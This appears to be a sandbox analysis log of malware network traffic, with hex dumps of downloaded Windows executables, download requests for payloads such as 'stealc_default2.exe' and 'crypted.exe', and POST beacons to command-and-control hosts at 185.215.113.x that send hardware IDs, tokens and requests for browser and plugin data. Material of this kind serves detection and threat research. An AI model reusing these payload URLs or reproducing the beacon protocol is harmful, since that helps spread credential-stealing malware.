Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 13:44:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 31 Aug 2024 13:44:48 GMTContent-Type: application/octet-streamContent-Length: 1411961Last-Modified: Fri, 30 Aug 2024 22:54:50 GMTConnection: keep-aliveETag: "66d24dba-158b79"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 4b 5a 65 25 2a 34 36 25 2a 34 36 25 2a 34 36 2c 52 b7 36 26 2a 34 36 2c 52 a7 36 34 2a 34 36 25 2a 35 36 89 2a 34 36 3e b7 9e 36 2b 2a 34 36 3e b7 ae 36 24 2a 34 36 3e b7 a9 36 24 2a 34 36 52 69 63 68 25 2a 34 36 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 cf e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 70 00 00 00 da 3e 00 00 42 00 00 99 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 c0 48 00 00 04 00 00 cb 29 16 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 30 47 00 2a 4f 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 00 48 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 6f 00 00 00 10 00 00 00 70 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 66 3e 00 00 b0 00 00 00 02 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 20 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 2a 4f 01 00 00 30 47 00 00 50 01 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0e 32 00 00 00 80 48 00 00 34 00 00 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 31 Aug 2024 13:44:52 GMTContent-Type: application/octet-streamContent-Length: 435200Last-Modified: Fri, 30 Aug 2024 22:07:37 GMTConnection: keep-aliveETag: "66d242a9-6a400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ef 1e d2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 06 05 00 00 ce 01 00 00 00 00 00 94 f4 01 00 00 10 00 00 00 20 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 23 06 00 c8 00 00 00 00 b0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 98 4d 00 00 a0 b1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c b2 05 00 18 00 00 00 d8 b1 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 04 05 00 00 10 00 00 00 06 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b2 15 01 00 00 20 05 00 00 16 01 00 00 0a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 66 00 00 00 40 06 00 00 34 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 b0 06 00 00 02 00 00 00 54 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 4d 00 00 00 c0 06 00 00 4e 00 00 00 56 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 31 Aug 2024 13:44:52 GMTContent-Type: application/octet-streamContent-Length: 435200Last-Modified: Fri, 30 Aug 2024 22:07:37 GMTConnection: keep-aliveETag: "66d242a9-6a400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ef 1e d2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 06 05 00 00 ce 01 00 00 00 00 00 94 f4 01 00 00 10 00 00 00 20 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 23 06 00 c8 00 00 00 00 b0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 98 4d 00 00 a0 b1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c b2 05 00 18 00 00 00 d8 b1 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 04 05 00 00 10 00 00 00 06 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b2 15 01 00 00 20 05 00 00 16 01 00 00 0a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 66 00 00 00 40 06 00 00 34 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 b0 06 00 00 02 00 00 00 54 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 4d 00 00 00 c0 06 00 00 4e 00 00 00 56 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 31 Aug 2024 13:44:52 GMTContent-Type: application/octet-streamContent-Length: 435200Last-Modified: Fri, 30 Aug 2024 22:07:37 GMTConnection: keep-aliveETag: "66d242a9-6a400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ef 1e d2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 06 05 00 00 ce 01 00 00 00 00 00 94 f4 01 00 00 10 00 00 00 20 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 23 06 00 c8 00 00 00 00 b0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 98 4d 00 00 a0 b1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c b2 05 00 18 00 00 00 d8 b1 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 04 05 00 00 10 00 00 00 06 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b2 15 01 00 00 20 05 00 00 16 01 00 00 0a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 66 00 00 00 40 06 00 00 34 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 b0 06 00 00 02 00 00 00 54 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 4d 00 00 00 c0 06 00 00 4e 00 00 00 56 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /storage/openvpn12.exe HTTP/1.1Host: cgil.in
Source: global traffic	HTTP traffic detected: GET /attachments/1274634716451967060/1279369983616487515/setup.exe?ex=66d431a5&is=66d2e025&hm=f41442d80495f6a2b7fa4f70e7ef73da8776008d0846edb0aacd7623c35305fc& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dl/12041962/gh941.bat HTTP/1.1Host: tmpfiles.org
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: GET /3823166/crypted.exe?hash=AgADZl HTTP/1.1Host: ddl.safone.dev
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/crypteda.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000004001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000005001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/stealc_default2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.17Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000066001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHHost: 185.215.113.17Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 45 45 35 38 32 44 46 42 39 45 34 38 37 32 35 36 33 32 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 2d 2d 0d 0a Data Ascii: ------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="hwid"FEEE582DFB9E487256326------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="build"default2------GCAKKECAEGDGCBFIJEGH--
Source: global traffic	HTTP traffic detected: GET /3827530/caesium-image-compressor.exe?hash=AgADPx HTTP/1.1Host: ddl.safone.dev
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIIDHost: 185.215.113.17Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="message"browsers------JKECFCFBGDHIECAAFIID--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGIHost: 185.215.113.17Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 2d 2d 0d 0a Data Ascii: ------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="message"plugins------AAFBAKECAEGCBFIEGDGI--
